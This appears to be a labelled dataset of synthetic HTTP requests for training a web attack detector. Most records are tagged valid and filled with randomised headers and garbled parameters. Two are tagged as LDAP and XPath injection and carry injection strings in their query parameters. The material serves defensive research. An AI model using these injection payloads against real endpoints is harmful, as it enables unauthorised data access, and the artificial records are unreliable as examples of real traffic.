Accept-Encoding: identity;q=0.9, gzip;q=0.2, identity, deflate
Accept-Language: teoi-ronutl6, auee-eHz0;q=0.7
Cache-Control: min-fresh=7
Client-ip: 182.200.144.214
Cookie: 4e=\1smn td;vee2iaim8=scTzcfmess0dAer;tiNip2ehieRetbn=vDim
Cookie2: $Version="83"
Date: Tue, 29 Sep 09 12:45:46 CET
ETag: "4IOrkQQnVN8PAnH0eo"
Expect: 100-continue
From: foete@taatit2Jr.de
If-Modified-Since: Sat, 15 Mar 08 07:21:38 GMT
If-Unmodified-Since: Wed, 24 Mar 04 07:15:54 UTC
If-Match: "1OoHkVWIVXb.iJOm8"
If-None-Match: "Rj_QzYdarddDdadlWpV"
If-Range: *
Max-Forwards: 19
MIME-Version: 0.7
Pragma: baNj4=rtdmtsg
Proxy-Authorization: tonnot ptrdtoe=7tift
Authorization: Basic bGhudnVjajplTGJudkM=
Range: 6762-8,77-668
Referer: /eiee1/EiAbibt2/lipslfl.css
TE: chunked;q=0.2,trailers,trailers
Trailer: Upgrade
User-Agent: ainntu/0.8.0.6.2
UA-CPU: x86
UA-Disp: 0659,464,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 8661x2250
Via: FTP/1.5 www.Enaar.jpeg, HTTP/2.6 www.xegcr.jpeg
Transfer-Encoding: compress
Upgrade: idoj/6.1, g7eoil/4.7, cotot/9.8, ewrnb/5.4, 2axs/6.7
Warning: 588 www.nwTa.shtml "bbpiwtiL" 
X-Forwarded-For: 34.245.202.84
X-Serial-Number: 2079694360100759
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32023
Start - Id: 33007
class: Valid
PUT /no0he/rldmvvavicv/hgoe3sBEootolp/rv7.htm? HTTP/1.1
Content-Length: 242
Content-Language: l9rnaato,juac4n
Content-Encoding: gzip
Content-Location: /snycmE/5eee1k.tiff
Content-MD5: c21uYW5oc2lyQVJkb21ubw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Jan 07 11:18:01 UTC
Last-Modified: Tue, 17 Feb 04 08:59:54 CET
Host: 212.103.242.110
Connection: gcrliw
Accept: */*;q=0.6
Accept-Charset: x-mac-turkish;q=0.5, windows-1257, euc-tw, euc-tw;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 230.67.86.189
Cookie: eh=xt;stasaeroa8l=ke te;rhhwaoeolisNemd=0062285
Cookie2: $Version="6"
Date: Fri, 13 Nov 09 05:29:13 CET
ETag: W/"01aqMSw7Vx@CbRYaUY-"
Expect: iHayqt=saueie
From: tennUc@psaw.gov
If-Modified-Since: Fri, 20 Jul 07 21:42:32 UTC
If-Unmodified-Since: Tue, 14 Sep 04 22:49:06 UTC
If-Match: *
If-None-Match: "wfvCwboSAetNsn.@"
If-Range: Thu, 22 Nov 07 13:07:57 UTC
Max-Forwards: 04
MIME-Version: 0.6
Pragma: yd2esrad=iCt9
Proxy-Authorization: hhFHT hdinre=f4edi9s
Authorization: Basic Y3pkcmlvbjp3NG9yZ294
Range: 7-,6-
Referer: /Mu2o61gn/sttcP.doc
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.7 (X11; U; Open BSD i386 7.5; nn-ui; rv:0.3.3) Gecko/46330822
UA-CPU: x86
UA-Disp: 0209,118,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0187x7765
Via: oLmTwt/0.5 244.202.53.51, pudefn/1.1 www.ehAOs.js, FTP/9.5 www.ewldrmEd.png
Transfer-Encoding: e9wn
Upgrade: trhg/2.1, seo/5.1, psppa/1.2
Warning: 229 3.87.67.188:155 "rolabuAsnlbse" "Mon, 12 Sep 05 12:07:12 GMT"
X-Forwarded-For: 92.249.204.222
X-Serial-Number: 233387288384041
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

kto4nnoaoziAre=s&9tmvoze0eselngz=m2e&tti=5&oLesf6ie1h=hafmfrsb&ooAgsYconnect=joci&seantBrfe=4948&zhf4nietvhA7atm=2219425144&sSI63lynddUx=3&e8b=ein&ssphutr=26116&ufhbhurao=3LO_nYV&ateBi=5025419845&anoqaaeAond=962&uudwtsWEn=27640&dddiwpmosope=6

End - Id: 33007
Start - Id: 23203
class: Valid
GET /hhe/mniorenhrzraimeIHpoh/DUAkiV7J3.jpg? HTTP/1.0
Host: 86.108.203.241:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=394
Client-ip: 25.69.134.247
Cookie: fUsL1hEOapeeLsa=isxHiapwmeen
Cookie2: $Version="6"
Date: Thu, 10 Sep 09 21:51:34 GMT
ETag: "YdyrKUwo87rU1DAeu"
Expect: slaFp=dehidse;utow=bdcizeMd
From: yEynS@yostnHon.org
If-Modified-Since: Wed, 01 Dec 04 06:09:42 GMT
If-Unmodified-Since: Sat, 18 Feb 06 11:05:27 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 28 May 04 02:49:07 UTC
Max-Forwards: 8
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZU9lY2c6ZG9lZQ==
Range: 9-705,-035
Referer: /Arnp4/etrasea.jsp
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: 1ilst/8.2.9.8
UA-CPU: PowerPC
UA-Disp: 1015,816,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 973x7584
Via: FTP/2.9 www.osljn.css, HTTP/8.7 2.184.171.184:6062, 6.5 216.5.70.196
Transfer-Encoding: gzip
Upgrade: enbe/7.1, 5nea/2.6, bie0n/5.7, ueru/7.3
Warning: 740 67.56.178.182:495 "aadiohcwejjhwee" 
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 591790037
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23203
Start - Id: 34928
class: Valid
PUT /s_ZPgmTQV/gSn3fSieiOSaenrecc/TsHiep/aqlnssawaoe/c8J5ugX/Unph-httpTLD.G3@%udW/Zm9ro/wfURhHjCgj8kp/qUqpMTh1Xuj/dvnsovgeerbosM0/loebonojsf1l5h/nq.dll? HTTP/1.1
Content-Length: 154
Content-Language: 5nt,rl
Content-Encoding: identity
Content-Location: http://www.ajiis.it/rx5ois/wtYmwxn/npjd/laH6nek.swf
Content-MD5: dTJzY0Vzc2FmaW9vdDAzcg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Mar 05 06:45:22 CET
Last-Modified: Fri, 09 Nov 07 23:49:41 GMT
Host: 104.221.50.175:179
Connection: close
Accept: image/*
Accept-Charset: cp-936;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.2
Cache-Control: max-age=9
Client-ip: 216.197.175.99
Cookie: gneilucnrT=ftpI;ryxeh=19869;tkl=ec5;g6e=s5rSf21
Cookie2: $Version="916"
Date: Thu, 02 Jun 05 19:21:57 UTC
ETag: W/"7y6u5C8mh1f8zYKx8"
Expect: 100-continue
From: sdqf@ierMt4h.ch
If-Modified-Since: Mon, 09 Aug 04 08:58:55 CET
If-Unmodified-Since: Fri, 20 Nov 09 04:04:06 UTC
If-Match: "Bt6BMeiIHASCKOJi"
If-None-Match: *
If-Range: "8Rhr7Da3-hizEQJV"
Max-Forwards: 093
MIME-Version: 6.7
Pragma: eihec=itnhruhE
Proxy-Authorization: Basic cFdvaGVzZTpldkhoVXI=
Authorization: Digest realm
Range: 26302-,-510,4934-
Referer: http://www.triEs4.biz/uC6bnaob/m0th/qGArh/lbtt7/jkvee.wmn
TE: gzip;q=0.2,deflate,trailers
Trailer: If-None-Match
User-Agent: ehjCpH http://www.E0n3.org
UA-CPU: x86
UA-Disp: 7242,197,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2377x8201
Via: 8.0 242.252.113.47, 8.1 www.4beod.html
Transfer-Encoding: gzip
Upgrade: yeadoo/9.1, ynen/6.6, egnCa/7.9, uis/6.9
Warning: 265 68.227.212.166:78 "moawtiltates" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 61683738419
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

reoreotatarijo=eo)ugtelnetlriframe[evalcw&U@u6U=tofItn5hti0&1connectvIm2g=2xFCELFmq&wveivht5ntes=ehv.MRCo&8O30=ekIwthgl9f&hOFh=zhd0smlIli3ag&ian=qaERg

End - Id: 34928
Start - Id: 91
class: Valid
GET /64s9aSjoeaq6p/ths/9-oi6gdnRGy/RptutJf/eisisdS/t0Vx-pN77uv/iSFD61t3Gpd1rM/nadtcTnhuo7iueRs/3Wvnj5ERKbAXfb_fo43J/sJV2Jh0DfUSyDR4bv.mspx?18n4oryztit=%3B&vhh=y3&5ls=iei-a&Ntaf3updates=57235&6sid=03422273&aeo=ehavingo&t8T=%3Flt&Asra6e3eYe=awfdChzSmtzqpae&5XdYbNbTinodexL=ethpawj%7C HTTP/1.1
Host: 234.36.40.169
Connection: close
Accept: */*
Accept-Charset: windows-1257;q=0.9, gb2312, windows-1253;q=0.0
Accept-Encoding: identity, gzip, compress, compress, gzip
Accept-Language: tadwgw-dRtfdjiO;q=0.8, dmd-9soski1;q=0.4
Cache-Control: ebac5b9o='h'
Client-ip: 49.251.239.6
Cookie: thie2juwiIenish=9hkiw5;texqe=eiYrite
Cookie2: $Version="03"
Date: Sun, 20 Aug 06 02:47:23 UTC
ETag: W/"_iDI58YBjNDV8n5_yr6"
Expect: 100-continue
From: 0aAT@medpMh.ch
If-Modified-Since: Wed, 09 Nov 05 23:55:39 GMT
If-Unmodified-Since: Fri, 01 Feb 08 04:45:16 CET
If-Match: "diA4KH9UgBqoFChGjORo"
If-None-Match: *
If-Range: "SZmuIvCFR76SyldbPh"
Max-Forwards: 50
MIME-Version: 9.6
Pragma: rh8imdgn='r'
Proxy-Authorization: NTLM bG5vaUllYmNmYWh0ZWkyd2F0ZHNkdWNudUFlc3NybGVpZmlucw==
Authorization: Basic aGZoejphaXNpcnVkRQ==
Range: 41396-563,553741-
Referer: http://www.sntbTs.ch/oenrde1e/2dli.js
TE: chunked;q=0.8
Trailer: Date
User-Agent: rD_ZuGxL http://www.erre8ehd.cz
UA-CPU: MIPS
UA-Disp: 4994,968,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5749x1102
Via: 8.0 99.175.90.173
Transfer-Encoding: identity
Upgrade: plohnd/1.0
Warning: 842 199.4.175.100 "ee1nrfsC0saOb" "Tue, 12 Feb 08 10:26:21 CET"
X-Forwarded-For: 218.162.193.207
X-Serial-Number: 9033271704641075484
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 91
Start - Id: 14733
class: Valid
GET /eRy.6jw1nr/hJWCO_FpCRKy/oqh1pT/onn/nitn/mT5oxr0B/xnlssateoy7t4fne/tXnnone/i434KD6P3dyJzlefg/piP9@C8MCluPAv2/FAkP4UformGED/iLpl4F..php3?asl=wrry6i&rnd=%3AEehtte%5BT%3Fseesc&sigsE6k=86767&tw54htdcixfj=ohfe1ce&maftz=n3t&aet4obLtgon=is&7eaaierseSras=m&elolqe6iAau3siu=hso9ysen&tnh62t1lwfnn=35008&KqShQservicesh9I=ssttVse HTTP/1.0
Host: 250.92.63.94:0737
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257
Accept-Encoding: 
Accept-Language: 8eze-7cblrt, 5afmde-sv;q=0.2, E-DRoecsta;q=0.5
Cache-Control: no-cache
Client-ip: 232.189.121.255
Cookie: mSbXhtaccesfu=n';ulkuyreisc=omOUtalUplpeeX4;ocnn0h=aKV7m-;zrtKruJmejth=gJ79dGSrr;choo=i8dye;elxvaebanceczp=tV
Cookie2: $Version="50"
Date: Mon, 05 Nov 07 21:27:43 GMT
ETag: W/"ICnEVgx7JLgYqP3"
Expect: NTut2g
From: nDone@1pntglpR.cz
If-Modified-Since: Sun, 13 Jan 08 15:32:41 UTC
If-Unmodified-Since: Fri, 27 Apr 07 03:34:55 UTC
If-Match: *
If-None-Match: "EjZejxaOYBj4XfW18Z.a"
If-Range: Wed, 02 Apr 08 22:42:02 GMT
Max-Forwards: 47
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest cnonce="IKnSxgcH"
Range: 444847-,76-,3-393
Referer: /cate/z46cirj/iHEtirn.jsp
TE: gzip;q=0.1,gzip;q=0.0
Trailer: User-Agent
User-Agent: Mozilla/6.2 (Machintosh; U; Mac OS X 9.9; d8-tr; rv:7.6.9) Gecko/70780580
UA-CPU: StrongARM
UA-Disp: 733,9202,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 887x095
Via: HTTP/8.9 www.saOn.jpg, 3.0 www.Nenwtt.png, FTP/7.2 www.a3Nt.tiff:7515
Transfer-Encoding: gzip
Upgrade: wka/5.4, itcal/5.7
Warning: 491 www.jeuiAh5t.htm "wjeodstn" "Wed, 27 May 09 09:21:52 GMT"
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 5935364150091795
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14733
Start - Id: 2823
class: Valid
GET /i4E_woKDEtS7edO/seml8o2OpK_jTO-_9/55T_t5var7z0processing-instruction@U68/9Zdnee8ehlur/oidztia0mcelm/okFhpP.jsp?idhdyt0sof=saermt&DEuuPMAobY=ncetatl8utE5krjrbp&Fsa=028976&8igidgee1eGnrna=aon&rseE=tnoWiehbtleiCt7awt&o5nhope3n2gase=gdx%7Ei&ymtu=Atqt5oheu9&hTi=srne1xp3k HTTP/1.1
Host: 157.120.71.211:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251;q=0.8, x-mac-korean, x-mac-arabic;q=0.8
Accept-Encoding: deflate, identity;q=0.3, identity
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 128.156.51.190
Cookie: cDeeefatdmite=u4yEs tta5ft10;cbm=5460488
Cookie2: $Version="3"
Date: Fri, 04 Feb 05 16:49:49 GMT
ETag: "hcNaxx7E@Au@DR0w"
Expect: Nxkt
From: amctiaa@rubrn.net
If-Modified-Since: Thu, 11 May 06 04:36:39 CET
If-Unmodified-Since: Sat, 22 Aug 09 15:37:46 UTC
If-Match: *
If-None-Match: "kcB3mq64FAP9bZJN0S"
If-Range: *
Max-Forwards: 355
MIME-Version: 8.2
Pragma: tiieiel=enerus
Proxy-Authorization: Basic b3J4dDp0NWozaFBz
Authorization: NTLM bzM4bmgzVGh0bHlhaXJhZHRlc2U1YzNlRGxiOWFhOGlpdHFhY2Vj
Range: -648
Referer: /naenwcke/agi5hlb.asp
TE: trailers,gzip
Trailer: If-Range
User-Agent: naqfeomisa (heGwTr; caZapy)
UA-CPU: Sparc
UA-Disp: 462,5180,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 620x373
Via: 6.6 192.92.16.249, 0.2 www.ruurcpt.png:93, 7.7 193.70.170.142
Transfer-Encoding: identity
Upgrade: Sbhjos/1.1
Warning: 710 163.232.225.18 "glcasie34ee" 
X-Forwarded-For: 213.3.252.110
X-Serial-Number: 8694580923107
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2823
Start - Id: 28602
class: Valid
GET /ZagydlXasjp/hKzzdy/gmnmkoy9wylmdioi.png?qsefSas=35477515 HTTP/1.0
Host: 228.230.151.41
Connection: close
Accept: */*
Accept-Charset: euc-tw, windows-1255
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 61.4.150.176
Cookie: 5erekuaep9is=Ssce;epalshneeta=te
Cookie2: $Version="4"
Date: Sun, 12 Dec 04 05:50:35 CET
ETag: W/"z4rKMjg3L9hK7P1So"
Expect: 100-continue
From: 9Dpl6@nhtia.be
If-Modified-Since: Mon, 01 Feb 10 21:28:01 GMT
If-Unmodified-Since: Fri, 28 Apr 06 02:49:26 GMT
If-Match: *
If-None-Match: "DpDt9kExuJyDTrv1g"
If-Range: Tue, 07 Mar 06 06:57:03 GMT
Max-Forwards: 847
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="nteit8ao"
Authorization: xsft onmmasmw=UCav5sS
Range: 850343-4980,8739-,53-
Referer: http://www.1xs4Dpsa.ch/fnten/3do6i4We/otSaf5/ACtnjaA.tiff
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.4 (X11; U; Linux i386 5.1; so-pn; rv:1.5.0) Gecko/63582027
UA-CPU: MIPS
UA-Disp: 224,8180,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 379x210
Via: 9.5 www.peuq.jpeg, 7.8 209.103.175.245
Transfer-Encoding: compress
Upgrade: issdao/1.6, ueifs/7.9, 0inuu/0.1, iiele/3.9, akt/0.1
Warning: 221 www.1et65lOl.htm:396 "oiug" 
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 90657
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28602
Start - Id: 32720
class: Valid
PUT /sn3Eea/eetpi1Nstehhn/nbJJxxpSoV6Up/KiDpOxbpiall.bin? HTTP/1.1
Content-Length: 135
Content-Language: erdxrn,ap
Content-Encoding: gzip
Content-Location: http://www.HaizHp.it/w8eaoT/trtwDbts.html
Content-MD5: ZU9hcnJpaXIxZW5zcHllcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Feb 07 16:04:19 UTC
Last-Modified: Tue, 30 Dec 08 06:51:52 GMT
Host: www.asews.org
Connection: close
Accept: image/*, video/*, application/*
Accept-Charset: windows-1258, x-mac-icelandic, gb2312, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: rpi-elpn, f-e
Cache-Control: max-age=1491
Client-ip: 235.107.190.226
Cookie: ohyt=2168534;roeihoe=apasswdahP;esnz8tmellurnn=1hahd pqe;ezin=hmRqrl;8nw7ueYre8=2860
Cookie2: $Version="02"
Date: Mon, 14 Sep 09 20:39:06 GMT
ETag: W/"pzpk9Q7FgM8Sgxh.kju7"
Expect: 100-continue
From: fe8a@oq0ry.ch
If-Modified-Since: Tue, 27 Apr 10 06:06:29 UTC
If-Unmodified-Since: Mon, 31 Jul 06 15:56:21 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 29 May 07 19:35:51 CET
Max-Forwards: 6
MIME-Version: 3.7
Pragma: 1rlnr='lrS'
Proxy-Authorization: Basic dHNuY05vb2c6b2h4cm80
Authorization: Digest uri=http://www.eiiesntf.net/9genFto/dteE.php4
Range: -512,-944936
Referer: http://www.Hnutdhr.org/pnwer/dtSfoq/1suEn.css
TE: chunked;q=0.8,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.9 (Windows; U; Windows NT 8.4; tI-cv; rv:4.4.5) Gecko/07061230
UA-CPU: PowerPC
UA-Disp: 9205,1280,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1210x8264
Via: 2.5 112.109.13.156:2
Transfer-Encoding: tlreo
Upgrade: nxt/2.7, rsi/6.1, 8ooys/6.1, eym/2.9, 0ssh/1.8
Warning: 971 www.nreie.html:86955 "sootstDgebnbLaecv" 
X-Forwarded-For: 154.7.116.173
X-Serial-Number: 5962543728498976504
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

koptDcCArdzZh=26273615&eaAafi=1469&ahnnd=9009295&ica=t:i&eo=5&ei9ee=etdvar&f2eAqtw2h=oewgetoa8r%x&aeswih1rhfne=ytsios&ilienQnn=noii

End - Id: 32720
Start - Id: 8348
class: Valid
GET /s9I5Ugb.aspx?4Oh-gr2-C=usO%28nTReSrHno&1srlncsh=group+by%2Bh%24r&tvoiddnh5sIchqo=28 HTTP/1.1
Host: www.AEsieo.fr:0124
Connection: ndum
Accept: audio/*, image/*;q=0.9
Accept-Charset: x-mac-korean, iso-2022-kr;q=0.7, shift_jis;q=0.2
Accept-Encoding: deflate, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 55.77.144.181
Cookie: e7toe=gbineu;97P0between=42168;ts=t liqmehtoptlexechyQaaaS;ss=icaaaat'soa2ws;cJQWvKDZSG=hGe3e;bs8ermreehh=nitDrctenhtpassadt
Cookie2: $Version="5"
Date: Fri, 11 Dec 09 19:23:28 UTC
ETag: W/"W_nuvRHj9UeeRBCgv5X"
Expect: in2fen
From: nssg@6rneleSr.gov
If-Modified-Since: Sat, 26 Apr 08 02:41:54 GMT
If-Unmodified-Since: Wed, 06 Jun 07 04:15:24 GMT
If-Match: *
If-None-Match: "o@ubME_egha963MM8"
If-Range: Mon, 23 Oct 06 15:26:10 UTC
Max-Forwards: 3
MIME-Version: 6.6
Pragma: nqre=ebelef
Proxy-Authorization: b5yes eadxakvc=hhuta
Authorization: NTLM QW9FTGVldHVhYXNoZW81ZVhlbjJ4NGJEZ3J3Y2d0QU1ldGFmbg==
Range: -2465,620-
Referer: http://ewedse5i.com/iEvrn4ar/weembdah/epdeTTb/mjzhueE.js
TE: gzip,chunked;q=0.0
Trailer: Upgrade
User-Agent: anfeayrr (a-Gc7ZiW; uuwH-@sFm)
UA-CPU: PowerPC
UA-Disp: 7385,2765,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 566x973
Via: ttdtd/8.0 63.127.42.130, HTTP/4.9 www.uCoJl.html
Transfer-Encoding: deflate
Upgrade: o3ee/6.3, yidAr/4.8
Warning: 629 111.149.129.27 "tdrbdodentEsntEwoXo" "Mon, 12 Apr 10 19:02:50 GMT"
X-Forwarded-For: 217.157.80.139
X-Serial-Number: 482816
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8348
Start - Id: 38145
class: LdapInjection
GET /dhnsm6idcn/PU_Y7@9Rjb0v7/hhtrszsliewslC5ufre/bvR/ii8gorduoYoe/7Wiykm5.AG6VfT4Pz/nDu8ej7o.php4?nwzim=tjheMaOb&aefprh5dv=%29+%28%7C+++%28crs%3Dw6fc*%29&tteae=ad%40h&jph=lxB7iwPmzS&oirIse5okefig=96915 HTTP/1.1
Host: www.obsj.biz
Connection: keep-alive
Accept: audio/x-wav, video/quicktime
Accept-Charset: *
Accept-Encoding: compress;q=0.8, compress;q=0.2
Accept-Language: Vhr-s0CUR, ohider-aYnad4to
Cache-Control: n9='oei6aunm'
Client-ip: 91.30.161.167
Cookie: E6dke_A_U=06716;betweenscript5andV7F60=430511;1N=etwtHsenel1irTc;nreo1hs=etIecgo9atCeia
Cookie2: $Version="22"
Date: Sun, 20 Jun 04 11:49:49 CET
ETag: W/"nDAIJJveFazGhbicY@"
Expect: 100-continue
From: ivla@elhhEa.be
If-Modified-Since: Fri, 21 Jan 05 21:28:52 CET
If-Unmodified-Since: Sat, 20 Dec 08 01:21:46 CET
If-Match: "N3cqanTivdrDhLZxH"
If-None-Match: "-iOTk3vFPLoG365T"
If-Range: "3.s_T6.Yxa7_4EP.C-b"
Max-Forwards: 5
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic YWVhbjplamVlY2hjbg==
Authorization: otsn nteso=OgI8
Range: 652463-080254,-92,5914-088
Referer: http://6sehord6.gov/oergea/sUaa/oovnmK/hlrAroix/rseeual.dll
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.1 (compatible; tpOeosp; Open BSD i586; xHeae; SnkdnRhene; oy6herdme)
UA-CPU: StrongARM
UA-Disp: 072,9161,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 9560x3335
Via: FTP/2.3 www.aie5e.js:0162, FTP/0.4 239.196.125.92:728
Transfer-Encoding: deflate
Upgrade: tfcsu/8.0, late/9.1, 9vp6/5.4, h2zo/6.8, hai3pl/9.2
Warning: 953 www.rhr1crat.jpeg "ndt4er0lwh7ihen2iO" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38145
Start - Id: 1310
class: Valid
GET /0oB28TH2.2/5VsX21ZDacceptrNO1Py/ft/jXHu/nZJ/iyIL-siRwOI.dll?enco=fcoht%3Ceeu&5aLo7sidxkimi=59251133&linet46ln=nsy&b7neew=28988&M7i=q4p&tw.9vtwherer7df%u=45235853&siz1enae=U%2Bh&ipbAmJfarEfr=fiw&Ua=taicopysy%3Eii+s HTTP/1.1
Host: www.ruSeys.fr
Connection: keep-alive
Accept: video/mpeg;q=0.1
Accept-Charset: windows-1257
Accept-Encoding: compress;q=0.7, compress;q=0.1, deflate;q=0.7, gzip
Accept-Language: dyaeaJ-Snio, NAaHg5P-uaneh;q=0.7, a-uhEkie, sh-6egeirMm;q=0.1, 5juwstts-2d
Cache-Control: min-fresh=92
Client-ip: 213.92.26.169
Cookie: eilnaioNfpN4=ii;utas3aiEbCetna=union';n656u=iS0xzLD2;sts=3807
Cookie2: $Version="5"
Date: Sat, 28 Feb 04 20:51:38 UTC
ETag: "O9V.X--I_KvseOR"
Expect: 2arTnecm
From: strldbE@9qmhittm.gov
If-Modified-Since: Sat, 25 Aug 07 04:07:15 CET
If-Unmodified-Since: Sat, 10 May 08 18:11:02 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Dec 04 22:23:30 CET
Max-Forwards: 885
MIME-Version: 9.4
Pragma: stnuzd='dA76'
Proxy-Authorization: Basic dE8zb3I6aHNrdGt2Nm8=
Authorization: NTLM dGh0ZGhySGF3Y1hFZTVsNXN2ZWl0dEVkZXRldm91cGlpY2hzbjFMZmtMZA==
Range: -216
Referer: http://7agisgih.cz/yybae/relhy1.fgf
TE: chunked,gzip;q=0.0,gzip;q=0.2
Trailer: Host
User-Agent: Mozilla/8.2 (Machintosh; U; PPC 4.6; Ru-oc; rv:9.6.0) Gecko/13857556
UA-CPU: Sparc
UA-Disp: 142,095,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7486x696
Via: 0.4 www.oheodhre.jpeg
Transfer-Encoding: htt8e1; lt7e=QEmasdh
Upgrade: mutL/9.2, iiM/7.3, lustl/1.7
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 855751913795
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1310
Start - Id: 992
class: Valid
GET /ekZRNeVvKRR.5q/rcsjidieeInrestsm/Iafcme2hthhsteodohnb/tz1r/Wj7/csCt-7z5zdjc./61U0APVE_V21g/eosfreoedHwtitht1e5/aWXq59WmSqc7F86dn/esrfr3eilcqmaatrvtd/ieoeioqn.css? HTTP/1.0
Host: 198.162.41.195:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: s=seeor0t
Client-ip: 226.147.179.150
Cookie: ctaaeep=11;welyyG=wmDlaalfa;ouferde=ueqiSidw;sssslwmitn=rttltohef14u;ntt68=tjlma6evalTbic7;ehsl=eiiL
Cookie2: $Version="1"
Date: Sat, 11 Jul 09 08:16:11 GMT
ETag: "0z.Oj8U2D.jOEf1MaD"
Expect: venose
From: foXr@hslaheed7.fr
If-Modified-Since: Sun, 16 May 04 23:12:13 UTC
If-Unmodified-Since: Mon, 25 Sep 06 05:49:44 UTC
If-Match: "qHDXO@hTNUlVDW0s_R5"
If-None-Match: *
If-Range: Sat, 24 Jan 09 24:17:10 GMT
Max-Forwards: 74
MIME-Version: 7.0
Pragma: esaes=hp
Proxy-Authorization: Basic aXNqdWU6b2hhZWlhc2M=
Authorization: bmeeoh 0raonpu=ntcIbnm
Range: 726319-,933-
Referer: http://www.vgoNu.it/ee86h/tges/jtcye8wr.png
TE: gzip
Trailer: Cache-Control
User-Agent: Mozilla/1.3 (Windows; U; Windows NT 9.6; us-ge; rv:6.9.5) Gecko/13588854
UA-CPU: MIPS
UA-Disp: 419,762,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 873x994
Via: 1.6 129.210.191.39, 5.3 www.woa8n.jpeg, 3.8 www.anaqiyr.jpeg:4
Transfer-Encoding: compress
Upgrade: toN3/6.1, bEer/8.1, 6eua/1.2, k0rtv/4.7
Warning: 561 123.33.248.80 "ohsncetm" 
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 045784
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 992
Start - Id: 49575
class: XPathInjection
GET /rrsUm6n/nidimxaesssn7sd/dcLJJn4Q8E.xSE/YdabtnyeAaDneo20/sSrte5Wlbfryouioa/LAhkUy/MRs0T9wi0dhDbM9/vhrKIshzKR1svbscript5/zoertP/i-S3Aemd-awCKdBdRml.mdb?nNiriTtn4=tsenodesnndh&sxs=1&X0T8formV4E=n5AoalrielUl&eP=asrrhes%5Db&atRlh6b=troiyutn9elOf5ep&nnyNyr2bsabeiep=485&oaoetoylTuadt8h=nes&rUkf=3850051&ahnthCenost=015&fgeea=4tE7selecttn9rmcpu&k0zn1ust5Y=0063128616&sge=macn%27++or++gNfs%2Fgung%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D5%5D+or+++%27si%27++++%3D+++%27&winnttWPR=heo3daNpota&zttehvicihfu=et&ednmoaysao=73957 HTTP/1.1
Host: 246.2.76.219
Connection: ochmsnd
Accept: */*
Accept-Charset: euc-tw, iso-8859-4
Accept-Encoding: compress, compress, identity;q=0.0
